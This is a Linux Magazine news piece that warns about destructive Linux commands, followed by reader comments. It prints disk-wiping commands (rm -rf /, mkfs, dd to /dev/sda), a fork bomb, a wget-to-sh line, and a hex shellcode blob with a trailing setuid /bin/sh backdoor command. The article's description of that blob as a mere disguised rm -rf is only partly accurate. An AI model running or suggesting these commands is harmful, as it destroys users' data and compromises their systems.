Seven Deadliest Linux Commands
In a TechSource Blog blog, Philippine technology student Jun Auza has assembled a list of the seven deadliest Linux commands, which his readers promptly augmented.
Auza warns new forum and chat participants not to fall into the trap of calling each other "dumbheads."
CAUTION! All commands included in the blog and that appear here actually destroy a complete Linux system. Those wishing to try them should do so on a separate, virtual machine. Please proceed at your own risk!
The first, classic deadly command is certainly:
rm -rf/
The command starts at root and will forcefully delete all files recursively. The result: the hard disk and all relevant files are wiped out.
A corollary to the first deadly command is its hex equivalent:
char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";
According to Auza, this encrypted version of rm -rf/ can "deceive even the rather experienced Linux users."
A deletion that might proceed somewhat faster than a complete hard disk wipeout is:
mkfs.ext3 /dev/sda
The command will do horrible things to sda.
If losing data were bad enough, consider this command:
:(){:|:&};:
It executes enough processes to freeze your system and completely corrupt your data. It is also known as the "forkbomb." Should you use the command in a startup script, at least a system message will mitigate the effect.
Back to the hard disk, with this command:
any_command > /dev/sda
The any_command can be for a favorite program that might output some terminal data, but in this case it writes it to the sda hard disk. As a rule, all data will span partitions and the entire filesystem will cross the River Styx.
Even Linux has so-called rootkits, malware that takes control of root and transforms the PC into an unwilling zombie. All you need is some_untrusted_source on the Web and use wget on it:
wget http:// some_untrusted_source -O- | sh
The command certainly invites trouble from the untrusted URL in the way of possible rootkits with malicious code.
The last of the seven deadliest commands Auza calls the /dev/null trick:
mv /home/my_home_directory/* /dev/null
Everything you move to /dev/null, such as your favorite home directory, will end up in the Big Garbage Heap.
As the responses to the blog steadily grow, many additional ways to destroy your Linux system are beginning to emerge. A prominent one is:
dd if=/dev/urandom of=/dev/sda
This fills the sda disk with random numbers. Oh joy!
Users should be especially wary of requests involving root privileges, the rm -rf or dd commands, redirection (via "|" and ">"), or using a hard disk (such as /dev/sda) as a parameter.
Comments
comments powered by DisqusSubscribe to our Linux Newsletters
Find Linux and Open Source Jobs
Subscribe to our ADMIN Newsletters
Support Our Work
Linux Magazine content is made possible with support from readers like you. Please consider contributing when you’ve found an article to be beneficial.
News
-
Canonical Bumps LTS Support to 12 years
If you're worried that your Ubuntu LTS release won't be supported long enough to last, Canonical has a surprise for you in the form of 12 years of security coverage.
-
Fedora 40 Beta Released Soon
With the official release of Fedora 40 coming in April, it's almost time to download the beta and see what's new.
-
New Pentesting Distribution to Compete with Kali Linux
SnoopGod is now available for your testing needs
-
Juno Computers Launches Another Linux Laptop
If you're looking for a powerhouse laptop that runs Ubuntu, the Juno Computers Neptune 17 v6 should be on your radar.
-
ZorinOS 17.1 Released, Includes Improved Windows App Support
If you need or desire to run Windows applications on Linux, there's one distribution intent on making that easier for you and its new release further improves that feature.
-
Linux Market Share Surpasses 4% for the First Time
Look out Windows and macOS, Linux is on the rise and has even topped ChromeOS to become the fourth most widely used OS around the globe.
-
KDE’s Plasma 6 Officially Available
KDE’s Plasma 6.0 "Megarelease" has happened, and it's brimming with new features, polish, and performance.
-
Latest Version of Tails Unleashed
Tails 6.0 is based on Debian 12 and includes GNOME 43.
-
KDE Announces New Slimbook V with Plenty of Power and KDE’s Plasma 6
If you're a fan of KDE Plasma, you'll be thrilled to hear they've announced a new Slimbook with an AMD CPU and the latest version of KDE Plasma desktop.
-
Monthly Sponsorship Includes Early Access to elementary OS 8
If you want to get a glimpse of what's in the pipeline for elementary OS 8, just set up a monthly sponsorship to help fund its continued existence.
jdong
Even more deadly
$ source ~/.bash_history
Well, how would you clean up THIS mess you just made?
data protection
Not really that dangerous....
Mind you, people would need to be signed in as root for these commands to do any significant damage (sudo or su will do), but as I keep saying to people, if they don't backup data they deserve to lose it.
Dad just lost 4 years of digital photos from a HDD crash--no funny commands there, and had prior to that his system plagued by virii before switching to GNU/Linux.
Other than that, great article!
stolen indeed
Not convinced? Let's look at a quick side-by-side:
Blog:
Known as forkbomb, this command will tell your system to execute a huge number of processes until the system freezes. This can often lead to corruption of data.
UF announcement:
Forkbomb: Executes a huge number of processes until system freezes, forcing you to do a hard reset which may cause corruption, data damage, or other awful fates.
Blog:
With this command, raw data will be written to a block device that can usually clobber the filesystem resulting in total loss of data.
UF annoucnement
Block device manipulation: Causes raw data to be written to a block device. Often times this will clobber the filesystem and cause total loss of data
If you think this wording choice is similar only by coincidence, then fine.
not stolen
Stolen from UbuntuForums announcement